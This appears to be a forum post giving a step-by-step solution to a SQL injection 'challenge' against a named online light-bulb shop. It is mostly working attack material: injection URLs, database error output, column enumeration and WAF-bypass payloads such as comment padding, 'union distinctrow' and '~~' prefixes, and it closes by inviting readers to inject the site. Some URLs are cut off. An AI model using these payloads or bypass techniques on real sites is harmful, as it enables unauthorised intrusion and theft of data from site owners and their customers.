Sql challenge

1. challenge is very nice. Many members will definately learn new things from there.So now I am posting text solution of my challenge.Remember this is my last post.
2. Target :-
3. http://www.lampbulbs.co.uk/product.php?prodid=162
4. Task :- Print version
5. Solution :-
6. Step 1. First I use ' to check site is vul or not.
7. http://www.lampbulbs.co.uk/product.php?prodid=162
8. By Putting ' like
9. http://www.lampbulbs.co.uk/product.php?prodid=162'
10. Result:-
11. Error in query: SELECT * FROM products WHERE prodid LIKE '162''. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''162''' at line 1
12. Mean site is vul to SQLI.
13. Step 2 :-
14. Lets Balance the query
15. http://www.lampbulbs.co.uk/product.php?prodid=162--
16. Result :- Forbidden Error
17. Hmm interesting.
18. Try %60 now
19. http://www.lampbulbs.co.uk/product.php?prodid=162%60
20. Result :- No error
21. Step 3 :- Finding number of columns using ORDER BY command
22. http://www.lampbulbs.co.uk/product.php…
23. Result :-
24. gasp emoticon gasp emoticon Again Forbidden Error. Lets bypass this
25. Try :-
26. http://www.lampbulbs.co.uk/product.php… --->Forbidden
27. http://www.lampbulbs.co.uk/product.php… ---> 403 Forbidden
28. http://www.lampbulbs.co.uk/product.phpprodid=162+OrDe…/…/%60
29. ---> Site Normal
30. Lets increase the number
31. http://www.lampbulbs.co.uk/product.php…
32. ----> Same Result. Lets try String Base SQLI
33. http://www.lampbulbs.co.uk/product.php…
34. Result :--
35. Error in query: SELECT * FROM products WHERE prodid LIKE '16' OrDeR bY /**100**/`'. Unknown column ''' in 'order clause'
36. Hmm interesting
37. http://www.lampbulbs.co.uk/product.php…
38. Result same as above gasp emoticon gasp emoticon gasp emoticon
39. Now here is new step for some members to learn
40. I experimented and do this
41. http://www.lampbulbs.co.uk/product.php…-- -
42. Notice /**1**/1 <--- New things which i learned from forum some months ago.
43. Now increase the number
44. like
45. /**1**/2 <--- Note 2 there
46. http://www.lampbulbs.co.uk/product.php?prodid=162' order by/**1**/2--+-
47. You see this --->
48. Energy Saving Light Bulbs Household >
49. Crompton Energy Saving GU10 11 Watt Warm White or Cool White
50. Manufacturer: Crompton Lamps
51. Energy Saving GU10 alternative to halogen.
52. High Quality Lamp
53. 11watts = to 55 watt GLS
54. 600 Lumens
55. Great Value For Money
56. Reduces Your Lighting Costs
57. 8000 Hours Life
58. Crompton Energy Saving GU10 11 Watt Warm White or Cool White
59. Error in query: SELECT param_name FROM parameters WHERE prodid LIKE '162' order by/**1**/2-- -' ORDER BY paramid. Unknown column '2' in 'order clause'
60. So is that mean there is 1 column . Hmm lets check
61. Lets use UNION SELECT Command once --->
62. http://www.lampbulbs.co.uk/product.php?prodid=162' union select 1--+-
63. So its giving Forbiden Error. Mean WAF. Lets bypass this WAF.
64. http://www.lampbulbs.co.uk/product.php?prodid=162' /*!union*/ select 1--+-
65. Same WAF Appear. So after trying some WAF Bypass method i get to know to use distinctrow. This will Bypass WAF.Lets now use this
66. http://www.lampbulbs.co.uk/product.php?prodid=162' union distinctrow select 1--+-
67. Result :-
68. Error in query: SELECT * FROM products WHERE prodid LIKE '162' union distinctrow select 1-- -'. The used SELECT statements have a different number of columns
69. gasp emoticon Its mean we are using wrong column. Column must be more than 1.If we see above error we can do Error Base SQLI. But here in this challenge i used Union Base SQLI. So lets TRY More.
70. As You see error on 2 so i guess that one is not actual error. There must be another real error.So lets try
71. http://www.lampbulbs.co.uk/product.php?prodid=16' order by /**1**/10-- -
72. Same error. Lets increase number.
73. http://www.lampbulbs.co.uk/product.php?prodid=16' order by /**1**/100-- -
74. This time error is different ---->
75. Error in query: SELECT * FROM products WHERE prodid LIKE '16' order by /**1**/100-- -'. Unknown column '100' in 'order clause'
76. So this is the actual error.I got 42 columns using this.
77. Column 43 --->
78. http://www.lampbulbs.co.uk/product.php?prodid=16' order by /**1**/43-- -
79. Error :-
80. Error in query: SELECT * FROM products WHERE prodid LIKE '16' order by /**1**/43-- -'. Unknown column '43' in 'order clause'
81. Column 42 --->
82. http://www.lampbulbs.co.uk/product.php?prodid=16' order by /**1**/42-- -
83. False error with site normal. Hmm its mean number of columns is 42. smile emoticon
84. Step 3:- Lets find number of vulnerable columns out of 42 columns
85. Command use for this union select. But as I mentioned above already about distinctrow so now i use this.
86. http://www.lampbulbs.co.uk/product.php?prodid=16'union distinctrow select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42-- -
87. Result :-- 403 Forbidden mean WAF.
88. I always used different different types to bypass WAF but yesterday I thought to do some experiment so I did differently.
89. By examine the WAF Behaviour i noticed that WAF was like this union select number,number so i did this
90. http://www.lampbulbs.co.uk/product.php?prodid=162'union distinctrow select 1,~~2,~~3,~~4,~~5,~~6,~~7,~~8,~~9,~~10,~~11,~~12,~~13,~~14,~~15,~~16,~~17,~~18,~~19,~~20,~~21,~~22,~~23,~~24,~~25,~~26,~~27,~~28,~~29,~~30,~~31,~~32,~~33,~~34,~~35,~~36,~~37,~~38,~~39,~~40,~~41,~~42-- -
91. I got some vulnerable columns. Now you can inject site as normal.